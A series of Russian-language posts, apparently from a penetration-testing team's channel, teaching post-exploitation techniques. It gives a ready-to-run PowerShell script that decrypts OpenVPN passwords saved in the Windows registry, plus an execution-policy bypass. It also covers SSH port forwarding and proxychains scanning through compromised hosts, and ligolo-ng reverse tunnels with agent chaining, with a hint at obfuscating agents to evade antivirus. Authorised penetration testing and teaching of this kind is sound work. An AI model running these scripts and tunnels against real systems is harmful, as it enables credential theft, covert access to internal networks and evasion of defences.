🔐 Извлечение сохраненных паролей в OpenVPN (Windows)

Если в ходе пентеста вы получили доступ к сессии пользователя, хранящего пароли VPN в OpenVPN, можно использовать PowerShell-скрипт для извлечения и расшифровки учетных данных из реестра.

🔸Если вдруг у вас отключено исполнение скриптов Powershell, не забудьте прописать:

Set-ExecutionPolicy Bypass -Scope CurrentUser

🔸Код скрипта:

Add-Type -AssemblyName System.Security
$keys = Get-ChildItem "HKCU:\Software\OpenVPN-GUI\configs"
$items = $keys | ForEach-Object {Get-ItemProperty $_.PsPath}

foreach ($item in $items)
{
  Write-Host ('Config name: ')
  Write-Host ($item.'PSChildName')
  

  $username=$encryptedbytes=$item.'username'
  Write-Host ('Username: ')
  Write-Host ([System.Text.Encoding]::Unicode.GetString($username))

  $encryptedbytes=$item.'auth-data'
  $entropy=$item.'entropy'
  $entropy=$entropy[0..(($entropy.Length)-2)]

  $decryptedbytes = [System.Security.Cryptography.ProtectedData]::Unprotect(
    $encryptedBytes, 
    $entropy, 
    [System.Security.Cryptography.DataProtectionScope]::CurrentUser)
  Write-Host ('Password: ')
  Write-Host ([System.Text.Encoding]::Unicode.GetString($decryptedbytes))
  
  $encryptedbytes=$item.'key-data'
  $entropy=$item.'entropy'
  $entropy=$entropy[0..(($entropy.Length)-2)]

  $decryptedbytes = [System.Security.Cryptography.ProtectedData]::Unprotect(
    $encryptedBytes, 
    $entropy, 
    [System.Security.Cryptography.DataProtectionScope]::CurrentUser)
  Write-Host ('Key password: ')
  Write-Host ([System.Text.Encoding]::Unicode.GetString($decryptedbytes))
  Write-Host (' ')

}

Если скрипт отработал корректно, то он выведет: название конфига, имя пользователя, пароль и пароль от ключа:

Config name:
test_config_1
Username:
Test_Username
Password:
Secure_password
Key password:
key_pass

Config name:
test_config_2
Username:
Test_user
Password:
Secure_password
Key password:
Secure_key_pass

🧬 Pivoting: организуем доступ к изолированным серверам

Начинаем серию постов, посвящённых пивотингу — ключевой технике в арсенале пентестера для продвижения внутри сети после получения первоначального доступа.

Пивотинг — это техника, позволяющая получить доступ к внутренним сетям, изначально недоступным напрямую, с помощью скомпрометированных узлов.

В этой серии мы рассмотрим различные техники и утилиты для пивотинга, которые используем в повседневной работе. Мы начнём с базовых, широко известных методов и перейдём к более продвинутым техникам.

🔐 SSH 1/2
Это самый простой и доступный способ пивотинга, не требующий установки дополнительных инструментов.

Сервис SSH поддерживает возможность проброса портов, что делает его удобным инструментом для обеспечения доступа к изолированным ресурсам сети через доступные узлы.

Если у вас есть SSH-доступ к узлу внутри сети, вы можете использовать его в качестве транспорта для доступа к другим сервисам, недоступным напрямую. Это особенно полезно при обходе ограничений или при необходимости безопасного доступа к внутренним приложениям.

🛠Local port forwarding

Представим ситуацию: на скомпрометированном SSH-сервере host1 мы нашли учетные данные для подключения к PostgreSQL, но самого psql-клиента на сервере нет, а также у нас нет прав для установки пакета. В таком случае, мы можем установить на свой хост psql-клиент и выполнить проброс трафика на сервер с базой данной PostgreSQL (host2).

ssh -L 9999:host2:5432 user@host1

Эта команда создаст SSH-подключение к host1, при этом пробросит трафик с localhost:9999 нашей машины на порт 5432 сервера host2.

Теперь при использовании psql на нашей машине, мы можем подключиться к БД на host2 через host1.

psql -h localhost -p 9999 -U postgres

🛠Dynamic port forwarding

А что, если мы не хотим ограничиваться каким-то определённым портом или хостом? В таком случае у сервиса SSH есть функциональность работы в качестве SOCKS-прокси. Для использования данной функциональности нужно указать флаг -D и порт. Все запросы, направленные на этот локальный порт, обрабатываются через данный прокси и перенаправляются к конечным адресатам.

Пример создания SSH-подключения к host1 с поднятием SOCKS-прокси:

ssh -D 1080 user@host1

В результате на нашей машине откроется локальный порт 1080, который начнёт функционировать как SOCKS-прокси. Теперь можно без препятствий сканировать и подключаться к любым узлам, доступным с машины host1 — например, используя proxychains для проксирования трафика через настроенный туннель.

Перед запуском proxychains стоит проверить, какой порт у вас установлен в разделе ProxyList в файле proxychains.conf.

Таким образом, сканирование хоста 10.1.1.1 через SSH-сервер host1 будет выполняться так:

proxychains4 nmap -Pn -n -sT -sV --version-all -v 10.1.1.1 -oA result

Обратите внимание, что при сканировании через proxychains не получится использовать SYN-сканирование. Вместо этого нужно будет использовать полноценный Connect-скан (-sT).

Может ли публикация одной учетной записи в Github привести к взлому крупной огранизации? Еще как!

Делимся историей одного большого пентеста в нашей статье на хабре

В первой части рассказываем о подготовке и проведении фишинговой кампании

Приятного чтения!

🔄 Reverse TCP/TLS tunnel (1/4)

🔍 Введение

Продолжаем серию заметок о пивотинге — сегодня поговорим о Reverse TCP/TLS туннеле на базе Ligolo-ng.

Инструмент написан на Golang и позволяет удобно создавать туннели для обхода сетевых ограничений. Стоит учитывать, что ligolo может детектироваться антивирусным ПО и для обфускации кода можно использовать, например, garble в связке с upx, но эта уже совсем другая история.

Ligolo состоит из серверной и клиентской (агентской) частей, при этом клиентская часть не требует административных привилегий для работы. Инструмент весьма удобен - создает виртуальный TUN-интерфейс, что позволяет напрямую маршрутизировать трафик во внутреннюю сеть без необходимости настройки SOCKS-прокси, а также поддерживает хорошую скорость передачи данных. Это позволяет использовать различные инструменты без потерь в функциональности при проксировании. Кроме того, Ligolo поддерживает DNS-разрешение имен во внутренней сети, а также позволяет достаточно просто создавать цепочки туннелей из нескольких Ligolo-клиентов.

Перейдем к практике. У Ligolo есть очень подробная документация вот тут. В заметке мы расскажем только про основные моменты.
Скомпилируем серверную часть под Linux, а клиентскую под Windows и Linux под разные архитектуры:

git clone https://github.com/nicocha30/ligolo-ng

cd ligolo-ng

GOOS=linux GOARCH=amd64 go build -o server cmd/proxy/main.go

GOOS=windows GOARCH=amd64 go build -o client.exe cmd/agent/main.go

GOOS=linux GOARCH=arm64 go build -o client cmd/agent/main.go

🔄 Reverse TCP/TLS tunnel (2/4)

🔧 Базовое использование

Запустим сервер на нашем хосте (далее server) с самоподписанным сертификатом, хотя можно использовать и свой сертификат (флаги certfile и autocert). Sudo потребуется для создания TUN интерфейса. Рекомендуем стартовать сервер в tmux для последующей настройки маршрутов.

sudo ./server -selfcert -laddr 0.0.0.0:11601

Создадим в консоли ligolo TUN интерфейс, а также выведем отпечаток используемого сертификата для последующей настройки подключения клиентом.

interface_create --name 'ligolo'
certificate_fingerprint 

Cобранный бинарный файл клиента запустим на сервере, через который хотим проксировать трафик (далее client_1). Необходимо указать полученный отпечаток сертификата.

./client -connect <SERVER-IP>:11601 -accept-fingerprint <Cert_fingerprint>

Проверим на серверной стороне успешность подключения, выберем номер сесии клиента, а также посмотрим существующие интерфейсы на машине client_1. После чего запустим туннель.

session
ifconfig

start или tunnel_start --tun <name of interface>

Теперь на машине server необходимо прописать маршруты до нужных подсетей, доступных с машины client_1 (вот почему рекомендовали tmux).

sudo ip route add <NETWORK> dev ligolo

После чего можно производить любые манипуляции с изолированными хостами, например сканировать недоступные напрямую сети или подключаться по RDP. Стоит отметить, что если клиент был запущен без административных привилегий, то nmap не сможет корректно использовать raw-сокеты, поэтому лучше все равно его запускать с флагом --unprivileged.

nmap -Pn -n -sT -sV 172.26.100.150 -v
xfreerdp /u:<username> /p:<userpassword> /v:172.26.100.150:3389

🔄 Reverse TCP/TLS tunnel (3/4)

🔗 Проброс портов

В ligolo существует полезная функциональность проброса портов для создания цепочек или перенаправления трафика. Например, мы хотим произвести проброс через несколько узлов, либо же перенаправлять трафик, который таргетированно идет на машину жертвы, к нам.

Для этого на стороне server в консоли ligolo выполним следующую команду для проброса порта 4444 клиента в работающий туннель на локальный порт 5555 на стороне сервера (можно указать конкретый IP:port).

listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:5555

Чтобы вывести текущие пробросы и остановить необходимые, можно использовать команды:

listener_list
listener_stop

Используя проброс портов можно объединять клиентов (server → client_1 → client_2) в цепочку. Для этого на сервере сделаем проброс порта 4443 на первом клиенте (client_1), доступном напрямую атакующему.

listener_add --addr 0.0.0.0:4443 --to 127.0.0.1:11601

После чего подключим client_2 через client_1 к серверу.

./client -connect <CLIENT_1 IP>:11601 -accept-fingerprint <Cert_fingerprint>

🔄 Reverse TCP/TLS tunnel (4/4)

⚙️ Bind-режим

Кроме того, возможна работа с использованием bind-подключения, что может быть полезно, например, при обходе ограничений на исходящие соединения на стороне жертвы. Для этого запускаем клиент

 ./client -bind 0.0.0.0:4444

Подключаемся к нему сервером, после чего все как при обычном взаимодействии.

sudo ./server -selfcert
connect_agent --ip <CLIENT_1 IP>:4444

Продолжаем рассказывать историю одного большого пентеста в нашей статье на хабре

Вторая часть посвящена нестандартному способу повышения привилегий в домене Active Directory

Приятного чтения!